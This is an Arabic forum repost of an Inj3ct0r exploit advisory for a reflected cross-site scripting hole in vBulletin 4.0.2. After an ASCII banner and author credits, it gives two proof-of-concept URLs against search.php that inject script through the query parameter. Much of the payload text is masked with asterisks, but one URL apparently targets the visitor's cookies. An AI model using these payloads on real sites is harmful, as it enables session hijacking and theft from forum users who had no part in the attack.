ثغرة XSS في منتديات vb النسخة.0.2 4 بتاريخ 19/03/2010

[spammeur]

كود:

================================= 
Vbulletin 4.0.2 XSS Vulnerability 
================================= 

[+] Vbulletin 4.0.2 XSS Vulnerability 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`                   0 
0  /_,     ___   /_/_      ___  ,_/ /   _ ___           1 
1  /_/  /' _ `\ \/\ \/_/_\_<_  /'___  /    /`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : Inj3ct0r.com                                  0 
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 
0                                                                      0 
1                    ######################################            1 
0                    I'm 5ubzer0  member from Inj3ct0r Team            1 
1                    ######################################            0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 

[+] Discovered By: 5ubzer0 
[+] My id : http://inj3ct0r.com/author/2307 
[+] Original : http://inj3ct0r.com/exploits/9697 
# Version: Vbulletin 4.0.2 

www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">********>*****('xss');*********** 
www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=">********>*****(********.****ie);*********** 

Exemple: 
Pesquisar nos Fَruns - Fَrum Jogos Online